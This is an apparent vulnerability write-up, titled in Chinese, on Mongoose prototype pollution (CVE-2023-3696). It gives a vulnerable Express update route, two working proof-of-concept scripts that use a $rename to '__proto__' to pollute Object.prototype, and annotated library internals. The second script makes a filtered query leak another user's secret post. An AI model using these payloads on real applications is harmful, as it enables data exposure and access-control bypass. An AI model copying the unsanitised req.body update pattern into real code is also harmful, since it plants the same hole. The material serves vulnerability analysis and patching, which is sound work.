Mongoose 原型链污染致代码执行漏洞（CVE-2023-3696）

const express = require('express');const mongoose = require('mongoose');const Post = require('./models/post'); // Assuming you have a Post model in models/post.jsconst app = express();app.use(express.json()); // for parsing application/jsonapp.put('/post/:id', async (req, res) => {    const { id } = req.params;    try {        const post = await Post.findByIdAndUpdate(id, req.body, { new: true });         // new: true returns the updated post rather than the original post when the operation began        if (!post) {            return res.status(404).send();        }        res.send(post);    } catch (e) {        res.status(400).send(e);    }});

import { connect, model, Schema } from 'mongoose';await connect('mongodb://127.0.0.1:27017/exploit');const Example = model('Example', new Schema({ hello: String }));const example = await new Example({ hello: 'world!' }).save();await Example.findByIdAndUpdate(example._id, {    $rename: {        hello: '__proto__.polluted'    }});// this is what causes the pollutionawait Example.find();const test = {};console.log(test.polluted); // world!console.log(Object.prototype); // [Object: null prototype] { polluted: 'world!' }process.exit();

exploit> db.examples.find({})[  {    _id: ObjectId("64a757117e3dbf11b14e0fd4"),    __v: 0,    ['__proto__']: { polluted: 'world!' }  }]

// document.js/** * Init helper. * * @param {Object} self document instance * @param {Object} obj raw mongodb doc * @param {Object} doc object we are initializing * @param {Object} [opts] Optional Options * @param {Boolean} [opts.setters] Call `applySetters` instead of `cast` * @param {String} [prefix] Prefix to add to each path * @api private */function init(self, obj, doc, opts, prefix) {  // ...  function _init(index) {    // ...    if (!schemaType && utils.isPOJO(obj[i])) {      //  ...      // (1)      // our malicious payload first reaches here, where:      // obj is some document      // i = '__proto__'      // so, obj[i] gives Object.prototype, which gets used in (2)      init(self, obj[i], doc[i], opts, path + '.');    } else if (!schemaType) {      // (2)      // after the recursive call on (1), we reach here      // pollution happens on the next line, where:      // doc: Object.prototype,      // obj = { polluted: 'world!' },      // i = 'polluted'      doc[i] = obj[i];      if (!strict && !prefix) {        self[i] = obj[i];      }    } else {

import { connect, model, Schema } from 'mongoose';const mongoose = await connect('mongodb://127.0.0.1:27017/exploit');const Post = model('Post', new Schema({    owner: String,    message: String}));await Post.create({    owner: "SECRET_USER",    message: "SECRET_MESSAGE"});const post = await Post.create({    owner: "user",    message: "test message"});await Post.findByIdAndUpdate(post._id, {    $rename: {        message: '__proto__.owner'    }});// this pollutes Object.prototype.owner = "test message"await Post.find({ owner: "user" });// now, when querying posts, even when an owner is specified, all posts are returnedconst posts = await Post.find({    owner: "user2"});console.log(posts); // both posts created are found/*output:[  {    _id: new ObjectId("64a7610756da3c04f900bf49"),    owner: 'SECRET_USER',    message: 'SECRET_MESSAGE',    __v: 0  },  {    _id: new ObjectId("64a7610756da3c04f900bf4b"),    owner: 'user',    __v: 0  }]*/process.exit();